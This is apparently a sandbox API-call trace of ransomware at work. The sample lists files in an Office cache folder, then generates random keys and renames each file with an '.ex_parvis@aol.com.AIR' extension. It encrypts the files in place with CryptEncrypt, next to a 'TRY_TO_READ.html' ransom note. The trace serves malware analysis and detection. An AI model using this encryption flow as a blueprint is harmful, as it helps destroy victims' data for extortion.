	[0090.985] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5d8db0
	[0090.985] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583950
	[0090.985] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0090.985] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0090.985] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583950 | out: hHeap=0x540000) returned 1
	[0090.985] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5d8db0 | out: hHeap=0x540000) returned 1
	[0090.985] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa0) returned 0x5fbf80
	[0090.985] FindNextFileW (in: hFindFile=0x5da3f0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7cabec50, ftCreationTime.dwHighDateTime=0x1cb148c, ftLastAccessTime.dwLowDateTime=0x7cabec50, ftLastAccessTime.dwHighDateTime=0x1cb148c, ftLastWriteTime.dwLowDateTime=0xa60fd8f0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x1915, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PrjProrWW.xml", cAlternateFileName="PRJPRO~1.XML")) returned 1
	[0090.985] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0090.985] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0090.986] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x5895e0
	[0090.986] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0090.986] GetLastError () returned 0x0
	[0090.986] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xc0) returned 0x5db0d8
	[0090.986] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5895e0 | out: hHeap=0x540000) returned 1
	[0090.986] GetLastError () returned 0x0
	[0090.986] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5d8db0
	[0090.986] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583950
	[0090.986] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0090.986] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0090.986] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583950 | out: hHeap=0x540000) returned 1
	[0090.986] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5d8db0 | out: hHeap=0x540000) returned 1
	[0090.986] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa0) returned 0x5fc028
	[0090.986] FindNextFileW (in: hFindFile=0x5da3f0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6c87b0c0, ftCreationTime.dwHighDateTime=0x1cb148c, ftLastAccessTime.dwLowDateTime=0x6c87b0c0, ftLastAccessTime.dwHighDateTime=0x1cb148c, ftLastWriteTime.dwLowDateTime=0xa6b67930, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x9b6ba9f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PrjPrrWW.cab", cAlternateFileName="")) returned 1
	[0090.986] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0090.986] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0090.986] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x5895e0
	[0090.986] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0090.986] GetLastError () returned 0x0
	[0090.986] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xc0) returned 0x5db0d8
	[0090.986] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5895e0 | out: hHeap=0x540000) returned 1
	[0090.986] GetLastError () returned 0x0
	[0090.986] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5d8db0
	[0090.986] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583950
	[0090.986] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0090.986] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0090.986] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583950 | out: hHeap=0x540000) returned 1
	[0090.986] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5d8db0 | out: hHeap=0x540000) returned 1
	[0090.986] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa0) returned 0x5fc0d0
	[0090.986] FindNextFileW (in: hFindFile=0x5da3f0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x69dde270, ftCreationTime.dwHighDateTime=0x1cb04b2, ftLastAccessTime.dwLowDateTime=0x69dde270, ftLastAccessTime.dwHighDateTime=0x1cb04b2, ftLastWriteTime.dwLowDateTime=0xa8191670, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x150578, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="setup.exe", cAlternateFileName="")) returned 1
	[0090.986] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0090.986] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0090.986] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x5895e0
	[0090.987] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0090.987] GetLastError () returned 0x0
	[0090.987] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xc0) returned 0x5db0d8
	[0090.987] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5895e0 | out: hHeap=0x540000) returned 1
	[0090.987] GetLastError () returned 0x0
	[0090.987] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5d8db0
	[0090.987] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583950
	[0090.987] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0090.987] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0090.987] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583950 | out: hHeap=0x540000) returned 1
	[0090.987] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5d8db0 | out: hHeap=0x540000) returned 1
	[0090.987] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa0) returned 0x5fc178
	[0090.987] FindNextFileW (in: hFindFile=0x5da3f0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7ca00570, ftCreationTime.dwHighDateTime=0x1cb148c, ftLastAccessTime.dwLowDateTime=0x7ca00570, ftLastAccessTime.dwHighDateTime=0x1cb148c, ftLastWriteTime.dwLowDateTime=0xa8c227b0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x412b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1
	[0090.987] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0090.987] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0090.987] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x5895e0
	[0090.987] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0090.987] GetLastError () returned 0x0
	[0090.987] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xc0) returned 0x5db0d8
	[0090.987] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5895e0 | out: hHeap=0x540000) returned 1
	[0090.987] GetLastError () returned 0x0
	[0090.987] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5d8db0
	[0090.987] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583950
	[0090.987] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0090.987] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0090.987] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583950 | out: hHeap=0x540000) returned 1
	[0090.987] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5d8db0 | out: hHeap=0x540000) returned 1
	[0090.987] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa0) returned 0x5fc220
	[0090.987] FindNextFileW (in: hFindFile=0x5da3f0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc9f11bf0, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9f11bf0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9f11bf0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0090.987] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0090.987] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0090.987] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x5895e0
	[0090.987] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0090.988] GetLastError () returned 0x0
	[0090.988] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xc0) returned 0x5db0d8
	[0090.988] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5895e0 | out: hHeap=0x540000) returned 1
	[0090.988] GetLastError () returned 0x0
	[0090.988] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583950
	[0090.988] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583918
	[0090.988] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0090.988] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0090.988] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583918 | out: hHeap=0x540000) returned 1
	[0090.988] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583950 | out: hHeap=0x540000) returned 1
	[0090.988] FindNextFileW (in: hFindFile=0x5da3f0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc9f11bf0, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9f11bf0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9f11bf0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0
	[0090.988] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa0) returned 0x5fc2c8
	[0090.988] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8460
	[0090.988] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5967c0
	[0090.988] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0090.988] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0090.988] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml", dwFileAttributes=0x80) returned 1
	[0090.989] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 73
	[0090.989] GetProcessHeap () returned 0x540000
	[0090.989] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xf8) returned 0x5fb580
	[0090.989] lstrcpyW (in: lpString1=0x5fb580, lpString2="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml") returned="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml"
	[0090.989] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR"
	[0090.989] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0090.992] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x498
	[0090.992] GetProcessHeap () returned 0x540000
	[0090.992] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fb580 | out: hHeap=0x540000) returned 1
	[0090.992] GetFileSizeEx (in: hFile=0x498, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=16683) returned 1
	[0090.992] SetFilePointer (in: hFile=0x498, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x412b
	[0090.992] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0090.992] GetProcessHeap () returned 0x540000
	[0090.992] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0090.992] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0090.993] WriteFile (in: hFile=0x498, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0090.996] WriteFile (in: hFile=0x498, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0090.996] WriteFile (in: hFile=0x498, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0090.996] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x412b) returned 0x5fdb78
	[0090.996] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x412b) returned 0x601cb0
	[0090.997] SetFilePointer (in: hFile=0x498, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0090.997] ReadFile (in: hFile=0x498, lpBuffer=0x5fdb78, nNumberOfBytesToRead=0x412b, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5fdb78*, lpNumberOfBytesRead=0x3a1f778*=0x412b, lpOverlapped=0x0) returned 1
	[0090.998] SetFilePointer (in: hFile=0x498, lDistanceToMove=-16683, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0090.998] WriteFile (in: hFile=0x498, lpBuffer=0x601cb0*, nNumberOfBytesToWrite=0x412b, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x601cb0*, lpNumberOfBytesWritten=0x3a1f778*=0x412b, lpOverlapped=0x0) returned 1
	[0090.999] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fdb78 | out: hHeap=0x540000) returned 1
	[0091.001] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x601cb0 | out: hHeap=0x540000) returned 1
	[0091.002] CloseHandle (hObject=0x498) returned 1
	[0091.003] GetProcessHeap () returned 0x540000
	[0091.003] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0091.003] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8460 | out: hHeap=0x540000) returned 1
	[0091.003] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0091.003] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fc2c8 | out: hHeap=0x540000) returned 1
	[0091.003] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fc220 | out: hHeap=0x540000) returned 1
	[0091.003] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa0) returned 0x5fc220
	[0091.003] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8460
	[0091.003] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5967c0
	[0091.003] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0091.003] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0091.003] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe", dwFileAttributes=0x80) returned 1
	[0091.004] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe") returned 73
	[0091.004] GetProcessHeap () returned 0x540000
	[0091.004] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xf8) returned 0x5fb580
	[0091.004] lstrcpyW (in: lpString1=0x5fb580, lpString2="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe") returned="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe"
	[0091.004] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe.12781717671972518758.ex_parvis@aol.com.AIR"
	[0091.004] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.exe"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.exe.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0091.007] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.exe.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x498
	[0091.008] GetProcessHeap () returned 0x540000
	[0091.008] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fb580 | out: hHeap=0x540000) returned 1
	[0091.008] GetFileSizeEx (in: hFile=0x498, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=1377656) returned 1
	[0091.008] SetFilePointer (in: hFile=0x498, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x150578
	[0091.008] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0091.008] GetProcessHeap () returned 0x540000
	[0091.008] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0091.008] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0091.008] WriteFile (in: hFile=0x498, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0091.010] WriteFile (in: hFile=0x498, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0091.010] WriteFile (in: hFile=0x498, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0091.010] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x150578) returned 0x3c20020
	[0091.011] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x150578) returned 0x3d80020
	[0091.011] SetFilePointer (in: hFile=0x498, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0091.011] ReadFile (in: hFile=0x498, lpBuffer=0x3c20020, nNumberOfBytesToRead=0x150578, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3c20020*, lpNumberOfBytesRead=0x3a1f778*=0x150578, lpOverlapped=0x0) returned 1
	[0091.085] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0091.085] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0091.085] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab", dwFileAttributes=0x80) returned 1
	[0091.090] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab") returned 76
	[0091.090] GetProcessHeap () returned 0x540000
	[0091.090] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xfe) returned 0x5b8568
	[0091.090] lstrcpyW (in: lpString1=0x5b8568, lpString2="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab") returned="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab"
	[0091.090] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab.12781717671972518758.ex_parvis@aol.com.AIR"
	[0091.090] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprrww.cab"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprrww.cab.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0091.093] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprrww.cab.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x498
	[0091.093] GetProcessHeap () returned 0x540000
	[0091.093] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0091.093] GetFileSizeEx (in: hFile=0x498, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=162970271) returned 1
